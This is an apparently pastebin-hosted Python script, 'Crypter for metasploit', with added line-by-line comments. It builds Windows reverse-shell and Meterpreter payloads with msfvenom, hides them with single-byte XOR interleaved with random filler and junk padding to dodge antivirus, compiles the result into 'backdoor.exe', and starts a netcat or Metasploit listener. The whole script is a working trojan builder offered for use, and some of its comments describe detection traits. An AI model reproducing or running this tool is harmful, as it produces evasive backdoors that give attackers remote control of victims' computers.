Sh3lLDu5T

crypter

Mar 4th, 2015
  1. #!/usr/bin/python
  2. #=====================================
  3. #
  4. #   This Script requires
  5. #   http://pastebin.com/yfbYZRwc
  6. #
  7. #=====================================
  8. #coding: utf-8
  9. from struct import *
  10. import os
  11. import commands
  12. import subprocess
  13. import random
  14. os.system("clear")
  # Banner only; no state is set here.
  15. print "*********************************************"
  16. print "      : Crypter for metasploit :"
  17. print "   Edited by: Sh3LlDu5t and Cyb4FrE3z"
  18. print "*********************************************"
  19. print ""
  # lhost is the address the generated payload is configured to call back to.
  # Entering 'e' makes an outbound request to checkip.dyndns.org with curl,
  # appends the response to ip.txt, reads the file back with `cat` and deletes
  # it. That lookup is a network event and ip.txt is a short-lived on-disk
  # artifact of a run.
  20. host = raw_input("lhost (e for external ip) ?").strip()
  21. if host == 'e':
  22.     os.system("curl checkip.dyndns.org >> ip.txt")
  23.     lhost = commands.getoutput('cat ip.txt')
  24.     os.system("rm ip.txt")
  25.     os.system("clear")
  26.     print "[*] lhost: ", lhost
  27. else:
  28.     lhost = host
  29.     print "[*] lhost: ", lhost
  # lport is kept as the stripped input string; nothing in this run checks
  # that it is numeric or in range.
  30. lport = raw_input("lport ?").strip()
  31. print "[*] lport: ", lport
  # Menu of the seven Metasploit Windows reverse-connection payloads this
  # script can wrap; the choice is kept as the string "1".."7".
  32. print "**************************************"
  33. print "1) windows/shell_reverse_tcp"
  34. print "2) windows/shell/reverse_tcp"
  35. print "3) windows/shell/reverse_tcp_dns"
  36. print "4) windows/shell/reverse_http"
  37. print "5) windows/meterpreter/reverse_tcp"
  38. print "6) windows/meterpreter/reverse_tcp_dns"
  39. print "7) windows/meterpreter/reverse_http"
  40. print "**************************************"
  41. payload = raw_input("Select a payload (1-7):").strip()
  # Fixed working file names in the current directory: raw shellcode, the
  # generated C source, and the C template (the external paste named in the
  # file header) that the source is built from.
  42. payload_raw = "temp.raw"
  43. out = "temp.c"
  44. structure = "structure.c"
  # One-byte XOR key (0..255 inclusive) from the non-cryptographic `random`
  # module. The key is later passed into the C template, so this is
  # obfuscation rather than encryption: presumably the key ships inside the
  # built binary (template not shown here -- confirm).
  45. key = random.randint(0,255)
  # Builds two filler strings of random uppercase ASCII letters (chr 65..90,
  # 'A'..'Z'), each wrapped in double quotes. randomSize is drawn once from
  # 20480..25600, so the filler length differs between runs; junkA gets
  # randomSize - 1 letters and junkB gets randomSize letters.
  # Both strings are later substituted into the structure.c template,
  # presumably as C string literals (template not shown -- confirm).
  # For analysts: a sample built this way would be expected to carry two
  # multi-kilobyte runs of uppercase-only bytes if the template keeps them as
  # data; verify against an actual build before relying on that.
  46. print "[*] Generating random junk..."
  47. print "[*] Randomizing file size..."
  48. randomSize = random.randint(20480,25600)
  49.  
  50. junkA = ""
  51. junkB = ""
  52.  
  53. junkA += "\""
  54. for i in xrange(1,randomSize):
  55.     junkA += chr(random.randint(65,90))
  56. junkA +=  "\""
  57.  
  58. junkB += "\""
  59. for i in xrange(0,randomSize):
  60.     junkB += chr(random.randint(65,90))
  61. junkB +=  "\""
  62.  
  63.  
  64.  
  # Each branch shells out through os.system to generate raw shellcode for the
  # selected payload into temp.raw, requesting the x86/shikata_ga_nai encoder
  # with 8 iterations (-e / -i) and raw output (-f raw -o).
  # A menu value outside "1".."7" matches no branch and nothing is generated.
  # NOTE(review): lhost and lport come straight from raw_input and are
  # interpolated unquoted into a string that os.system hands to the shell.
  65. print "[*] Generating metasploit shellcode..."
  66. if payload == "1":
  67.     os.system("msfvemon -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s " % (lhost,lport,payload_raw))
  68.  
  69. elif payload == "2":
  70.     os.system("msfvemon -p windows/shell/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  71.  
  72. elif payload == "3":
  73.     os.system("msfvenom -p windows/shell/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  74.  
  75. elif payload == "4":
  76.     os.system("msfvenom -p windows/shell/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  77.  
  78. elif payload == "5":
  79.     os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  80.  
  81. elif payload == "6":
  82.     os.system("msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  83.  
  84. elif payload == "7":
  85.     os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 8 -f raw -o %s" % (lhost,lport,payload_raw))
  86.  
  87.  
  # Reads the raw shellcode (temp.raw, binary mode) and opens temp.c for the
  # generated C source.
  88. a = open(payload_raw,"rb")
  89. b = open(out,"w")
  90.  
  # payload_raw is rebound here: from the file name to the file's bytes.
  91. payload_raw = a.read()
  92. tempArray = []
  93. outArray = []
  94. x = 0
  95.  
  96. print "[*] Encoding with XOR key: ", hex(key)
  97. print "[*] Obfuscating shellcode..."
  # The encoded buffer is exactly twice the shellcode length.
  98. length = int(len(payload_raw)*2)
  99.  
  # Interleaving: even positions hold the next shellcode byte XORed with the
  # single-byte key; odd positions hold a random uppercase ASCII letter
  # (65..90). For analysts this is a fixed structure: every second byte of
  # the buffer lies in 0x41..0x5A, and dropping those bytes leaves a plain
  # single-byte XOR of the msfvenom output.
  100. for i in xrange(0,length):
  101.     if i % 2 == 0:
  102.         tempArray.append(unpack("B",payload_raw[x])[0]^key)
  103.         x += 1
  104.     else:
  105.         randomByte = random.randint(65,90)
  106.         tempArray.append(randomByte)   
  # Render every value as a C hex escape and group 15 escapes per quoted line,
  # then join the lines into one block of text.
  107. for i in range(0,len(tempArray)):
  108.     tempArray[i]="\\x%x"%tempArray[i]
  109. for i in range(0,len(tempArray),15):
  110.     outArray.append('\n"'+"".join(tempArray[i:i+15])+"\"")
  111. outArray = "".join(outArray)
  112.  
  # Literal text handed to the template; presumably the C expression its
  # decoder uses to tell payload bytes from filler (template not shown).
  113. devide = "i % 2;"
  114.  
  # structure.c is used as a %-format template with six slots, filled in this
  # order: junkA, the encoded buffer, junkB, the XOR key, the buffer length
  # and the `devide` text. The result is written to temp.c.
  115. open_structure = open(structure).read()
  116. code = open_structure % (junkA,outArray,junkB,key,length,devide)
  117. b.write(code)
  118. b.flush()
  119.  
  # Cross-compiles temp.c with the MinGW 32-bit toolchain. -mwindows selects
  # the Windows GUI subsystem. No -o is given, so the output is a.exe.
  120. print "[*] Compiling trojan horse..."
  121. os.system("i586-mingw32msvc-gcc -mwindows temp.c")
  # Debug symbols are stripped and the file is renamed; the final artifact in
  # the working directory is backdoor.exe.
  122. print "[*] Stripping out the debugging symbols..."
  123. os.system("strip --strip-debug a.exe")
  124. print "[*] Finishing..."
  125. os.system("mv a.exe backdoor.exe")
  126.  
  # Chooses how the operator side will listen. Option 1 (the non-staged shell
  # payload) starts a netcat listener on lport immediately and blocks there;
  # options 2-7 only record the Metasploit payload name in PAYLOAD for the
  # handler resource file written further down.
  127. if payload == "1":
  128.     print "[*] Starting the netcat listener..."
  129.     os.system("nc -lvp %s" % (lport))
  130. elif payload == "2":
  131.     PAYLOAD = "windows/shell/reverse_tcp"
  132. elif payload == "3":
  133.     PAYLOAD = "windows/shell/reverse_tcp_dns"
  134. elif payload == "4":
  135.     PAYLOAD = "windows/shell/reverse_http"
  136. elif payload == "5":
  137.     PAYLOAD = "windows/meterpreter/reverse_tcp"
  138. elif payload == "6":
  139.     PAYLOAD = "windows/meterpreter/reverse_tcp_dns"
  140. elif payload == "7":
  141.     PAYLOAD = "windows/meterpreter/reverse_http"
  142.  
  # Removes the intermediate files (generated C source and raw shellcode).
  # backdoor.exe and the handler.rc written below are left in the working
  # directory after the run.
  143. print "[*] Cleaning up..."
  144. os.system("rm temp.c")
  145. os.system("rm temp.raw")
  146.  
  # Writes a Metasploit resource script that configures multi/handler with
  # the chosen payload, LHOST and LPORT, keeps listening after the first
  # session (ExitOnSession false) and starts it as a background job.
  147. # write out rc file
  148. filewrite = file("handler.rc", "w")
  149. filewrite.write("use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (PAYLOAD,lhost,lport))
  150. filewrite.close()
  151.  
  # Optionally launches msfconsole with that resource script; any answer other
  # than "y" or "n" falls through both branches silently.
  152. #starting handler
  153. ans = raw_input("Do you want to start a handler now? (y/n)").strip()
  154. if ans == "y":
  155.     print "[*] Starting metasploit handler..."
  156.     os.system("msfconsole -r handler.rc")
  157. elif ans == "n":
  158.     print "[*] Run msfconsole -r handler.rc to start handler"
  159.  
  160. print "[*] Done !"